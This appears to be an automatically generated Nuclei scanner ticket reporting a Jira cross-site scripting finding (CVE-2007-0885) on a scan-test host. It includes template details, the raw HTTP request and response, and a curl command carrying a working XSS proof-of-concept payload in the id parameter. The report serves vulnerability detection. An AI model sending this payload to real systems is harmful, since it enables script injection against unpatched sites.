mkrs2404 / tickets


Jira Rainbow.Zen - Cross-Site Scripting (CVE-2007-0885) found on honey.scanme.sh #32

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: CVE-2007-0885 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e

Timestamp: Tue Apr 30 19:26:14 +0530 IST 2024

Template Information

| Key | Value |
| --- | --- |
| Name | Jira Rainbow.Zen - Cross-Site Scripting |
| Authors | geeknik |
| Tags | cve, cve2007, jira, xss, rainbow_portal |
| Severity | medium |
| Description | Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter. |
| Remediation | Apply the latest security patches or upgrade to a patched version of Jira Rainbow.Zen to mitigate the Cross-Site Scripting vulnerability. |
| CVSS-Metrics | CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P |
| CVE-ID | CVE-2007-0885 |
| CVSS-Score | 6.80 |
| vendor | rainbow_portal |
| product | rainbow.zen |

Request

GET /jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 284
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:56:14 GMT

GET /jira/secure/BrowseProject.jspa?id="><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0' 'https://honey.scanme.sh/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'

Generated by Nuclei v3.2.5